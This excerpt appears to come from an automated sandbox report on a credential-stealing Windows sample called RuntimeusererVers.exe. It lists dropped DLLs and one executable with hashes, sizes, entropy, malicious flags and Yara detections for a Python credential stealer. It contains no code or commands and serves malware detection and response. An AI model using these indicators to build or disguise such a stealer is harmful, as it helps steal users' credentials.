                                                                                                                                                                                                                                        SSDEEP:768:cXkHpFLJOXgD7JKgegsvC1wryTXkHjQwDchoPWmzDD/:cXkH/Qswge1WwryTXk8mchoPWmz
                                                                                                                                                                                                                                        MD5:34C2DD52C9E920E035444D6CBDDEB555
                                                                                                                                                                                                                                        SHA1:3FF99987B968261E88032652917F137D4A6A0493
                                                                                                                                                                                                                                        SHA-256:55814D323EE1EC6CD6145AE8F43DBF44D9481E3592AA17B5A17010F7E401FF42
                                                                                                                                                                                                                                        SHA-512:8F0BE0A3E2588BDEFF9F5C4EB728AE43A58A19B91596ADCA0C931D5425A591178F13DCEF68B1B949A2C805E1B9963800397F661688FD3C299D7084EFE45ADAF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3445016
                                                                                                                                                                                                                                        Entropy (8bit):6.099467326309974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                                                                                                                                                                                                        MD5:E94733523BCD9A1FB6AC47E10A267287
                                                                                                                                                                                                                                        SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                                                                                                                                                                                                        SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                                                                                                                                                                                                        SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39696
                                                                                                                                                                                                                                        Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                        MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                        SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                        SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                        SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704792
                                                                                                                                                                                                                                        Entropy (8bit):5.55753143710539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                                                                                                                                                                                                        MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                                                                                                                                                                                                        SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                                                                                                                                                                                                        SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                                                                                                                                                                                                        SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                                                                                        Entropy (8bit):5.344765898080963
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i005Gi4zzWerZi5s+AP6tzPVtLZ9rthfBie/4jejOcmKnNrODgYMjtNtnlsht6oR:thWu6tVlBiIjnVOIjbMrYyeW
                                                                                                                                                                                                                                        MD5:B92F8EFB672C383AB60B971B3C6C87DE
                                                                                                                                                                                                                                        SHA1:ACB671089A01D7F1DB235719C52E6265DA0F708F
                                                                                                                                                                                                                                        SHA-256:B7376B5D729115A06B1CAB60B251DF3EFC3051EBBA31524EA82F0B8DB5A49A72
                                                                                                                                                                                                                                        SHA-512:680663D6C6CD7B9D63160C282F6D38724BD8B8144D15F430B28B417DDA0222BFFF7AFEFCB671E863D1B4002B154804B1C8AF2D8A28FFF11FA94972B207DF081B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143360
                                                                                                                                                                                                                                        Entropy (8bit):6.075135460374895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:yYjAONgTgGNWARNEBXRzHJ0Xg9sGkD7EKN7Jv1FL/49olpS0mZP0c:nlTmsCD7Z7Jv19/49olY0m10c
                                                                                                                                                                                                                                        MD5:E611E5C516FE1C3670353E3427DA42B9
                                                                                                                                                                                                                                        SHA1:A946ABDEEBE7FA9CCD7AB256C927BE5902784E4A
                                                                                                                                                                                                                                        SHA-256:B4F41659DC3002F70BC6578801AAD771B45F106103441D1E9B4C553C1E50C939
                                                                                                                                                                                                                                        SHA-512:A1C057DBD4B618FDFDD75F70BFE85DBFC6D2A25FED8E74DD5FBF950A02D7470E1F4BFAC8ED00A5CDEF6A68B8737A156A5A0EA443E826C6B30C94554BD7326B99
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):199448
                                                                                                                                                                                                                                        Entropy (8bit):6.377510350928234
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                                                                                                                                                                                                        MD5:9C21A5540FC572F75901820CF97245EC
                                                                                                                                                                                                                                        SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                                                                                                                                                                                                        SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                                                                                                                                                                                                        SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67352
                                                                                                                                                                                                                                        Entropy (8bit):6.146621901948148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:rw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJSy:8/5k8cnzeJf9IPL037SyG3Px
                                                                                                                                                                                                                                        MD5:B711598FC3ED0FE4CF2C7F3E0877979E
                                                                                                                                                                                                                                        SHA1:299C799E5D697834AA2447D8A313588AB5C5E433
                                                                                                                                                                                                                                        SHA-256:520169AA6CF49D7EE724D1178DE1BE0E809E4BDCF671E06F3D422A0DD5FD294A
                                                                                                                                                                                                                                        SHA-512:B3D59EFF5E38CEF651C9603971BDE77BE7231EA8B7BDB444259390A8A9E452E107A0B6CB9CC93E37FD3B40AFB2BA9E67217D648BFCA52F7CDC4B60C7493B6B84
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5762840
                                                                                                                                                                                                                                        Entropy (8bit):6.089392282930885
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                                                                                                                                                                                                        MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                                                                                                                                                                                                        SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                                                                                                                                                                                                        SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                                                                                                                                                                                                        SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):30480
                                                                                                                                                                                                                                        Entropy (8bit):6.578957517354568
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                                                                                                                                                                                                        MD5:C97A587E19227D03A85E90A04D7937F6
                                                                                                                                                                                                                                        SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                                                                                                                                                                                                        SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                                                                                                                                                                                                        SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1504024
                                                                                                                                                                                                                                        Entropy (8bit):6.578962536427207
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:85Cmr6e6a6Ias3yjWdQty0ok8k378UZk+ZfZ4Se6TOs9CedxnYhR2Au:81/uIasCjWdaHokXk+9Z4Se6TO4dFYL5
                                                                                                                                                                                                                                        MD5:08D50FD2B635972DC84A6FB6FC581C06
                                                                                                                                                                                                                                        SHA1:4BCFC96A1AAD74F7AB11596788ACB9A8D1126064
                                                                                                                                                                                                                                        SHA-256:BB5AC4945B43611C1821FA575AF3152B2937B4BC1A77531136780CC4A28F82E9
                                                                                                                                                                                                                                        SHA-512:8EC536E97D7265F007AD0F99FC8B9EECC9355A63F131B96E8A04E4BD38D3C72E3B80E36E4B1923548BD77EB417C5E0AC6A01D09AF23311784A328FBED3C41084
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1141016
                                                                                                                                                                                                                                        Entropy (8bit):5.435086202175289
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:83kYbfjwR6nblonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1ol:8UYbMA0IDJcjEwPgPOG6Xyd461ol
                                                                                                                                                                                                                                        MD5:AA13EE6770452AF73828B55AF5CD1A32
                                                                                                                                                                                                                                        SHA1:C01ECE61C7623E36A834D8B3C660E7F28C91177E
                                                                                                                                                                                                                                        SHA-256:8FBED20E9225FF82132E97B4FEFBB5DDBC10C062D9E3F920A6616AB27BB5B0FB
                                                                                                                                                                                                                                        SHA-512:B2EEB9A7D4A32E91084FDAE302953AAC57388A5390F9404D8DFE5C4A8F66CA2AB73253CF5BA4CC55350D8306230DD1114A61E22C23F42FBCC5C0098046E97E0F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109392
                                                                                                                                                                                                                                        Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                                        MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                                        SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                                        SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                                        SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67072
                                                                                                                                                                                                                                        Entropy (8bit):5.872119413277649
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:0lC4VDCD5Pd8jeE9+d8cxIRJpyZVEqyaFtYpquFajBSsDJLSGg8fJwJ5ZRYuK5G:48Dv8qo+xIRyo+FtaFMBFDv7OJ543
                                                                                                                                                                                                                                        MD5:0EDC0F96B64523314788745FA2CC7DDD
                                                                                                                                                                                                                                        SHA1:555A0423CE66C8B0FA5EEA45CAAC08B317D27D68
                                                                                                                                                                                                                                        SHA-256:DB5B421E09BF2985FBE4EF5CDF39FC16E2FF0BF88534E8BA86C6B8093DA6413F
                                                                                                                                                                                                                                        SHA-512:BB0074169E1BD05691E1E39C2E3C8C5FAE3A68C04D851C70028452012BB9CB8D19E49CDFF34EFB72E962ED0A03D418DFBAD34B7C9AD032105CF5ACD311C1F713
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):655360
                                                                                                                                                                                                                                        Entropy (8bit):6.429498330590438
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Xs/doJlY/OBzRSxUlcUmNNuNkOFIj+fWT0hrHPPoX1yZcG7:mAuOBzRSxUlvFIj+fWIPPM1yZcg
                                                                                                                                                                                                                                        MD5:4327027D7CB61F547E22C4F668EB7BF7
                                                                                                                                                                                                                                        SHA1:22F413D03A90D04D571526687E43EB255F427435
                                                                                                                                                                                                                                        SHA-256:E681900AEB771E57BC063E44B303293E11DF32F1B1FECDCBC00574C00E75626C
                                                                                                                                                                                                                                        SHA-512:16A2E2E262C0246906D48EA67EE17D38C07712A1B97EB18C4F8F656F39EB187E18DA3EDC6D2FDF49DC9E35B92F6BA6BDE0F00948C3E68E146F7EDCD1E9C9404A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):524800
                                                                                                                                                                                                                                        Entropy (8bit):6.43361179692515
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:LhqzrH09USNNSNkUvpMnAp5Oqwj/k6OsoOfu/PYS/O51Y/H:LhqzrH0evpMnApu86OsynYUPv
                                                                                                                                                                                                                                        MD5:DC08F04C9E03452764B4E228FC38C60B
                                                                                                                                                                                                                                        SHA1:317BCC3F9C81E2FC81C86D5A24C59269A77E3824
                                                                                                                                                                                                                                        SHA-256:B990EFBDA8A50C49CD7FDE5894F3C8F3715CB850F8CC4C10BC03FD92E310260F
                                                                                                                                                                                                                                        SHA-512:FBC24DD36AF658CECE54BE14C1118AF5FDA4E7C5B99D22F99690A1FD625CC0E8AA41FD9ACCD1C74BB4B03D494B6C3571B24F2EE423AAAE9A5AD50ADC583C52F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24189952
                                                                                                                                                                                                                                        Entropy (8bit):6.346346908201171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:CFUine3T2HszWM/LvOrN6hC0lxy6D5DKJBlZGODSr1YQaxLaIaiFrEF9o31g6d6T:lD+SWKOr4CeXDuHwODSw6uc
                                                                                                                                                                                                                                        MD5:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        SHA1:CEB0FE13317E7EF87377D385E9CF869343958971
                                                                                                                                                                                                                                        SHA-256:6D350FD6D807F267F5B615CF5937DABB99E5F30ED3B3310E1BF2AA2A34F93F8E
                                                                                                                                                                                                                                        SHA-512:9CDC43BCE53CC6B9A388B9FB50BF81DB413432BEB0B607D14942DB6CEDDCEEB38CBEB9896916BF73A72E06731D16755F20A475523BE63177996A3D9BCDD6FA0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.186171767195339
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:a2icaMc9070S1Qx+gTKnEzBIPOnr07SyLLDPx:a2icrcj2Qx+gTOEzBIPOnYxXx
                                                                                                                                                                                                                                        MD5:79F71C92C850B2D0F5E39128A59054F1
                                                                                                                                                                                                                                        SHA1:A773E62FA5DF1373F08FEAA1FB8FA1B6D5246252
                                                                                                                                                                                                                                        SHA-256:0237739399DB629FDD94DE209F19AC3C8CD74D48BEBE40AD8EA6AC7556A51980
                                                                                                                                                                                                                                        SHA-512:3FDEF4C04E7D89D923182E3E48D4F3D866204E878ABCAACFF657256F054AEAFAFDD352B5A55EA3864A090D01169EC67B52C7F944E02247592417D78532CC5171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):820736
                                                                                                                                                                                                                                        Entropy (8bit):6.056263694016779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                                                                                                                                                                                                        MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                                                                                                                                                                                                        SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                                                                                                                                                                                                        SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                                                                                                                                                                                                        SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84760
                                                                                                                                                                                                                                        Entropy (8bit):6.570831353064175
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                                                                                                                                                                                                        MD5:3859239CED9A45399B967EBCE5A6BA23
                                                                                                                                                                                                                                        SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                                                                                                                                                                                                        SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                                                                                                                                                                                                        SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):181760
                                                                                                                                                                                                                                        Entropy (8bit):6.176962076839488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                                                                                                                                                                                                        MD5:FDE9A1D6590026A13E81712CD2F23522
                                                                                                                                                                                                                                        SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                                                                                                                                                                                                        SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                                                                                                                                                                                                        SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):123664
                                                                                                                                                                                                                                        Entropy (8bit):6.058417150946148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                                                                                                                                                                                                        MD5:BD36F7D64660D120C6FB98C8F536D369
                                                                                                                                                                                                                                        SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                                                                                                                                                                                                        SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                                                                                                                                                                                                        SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
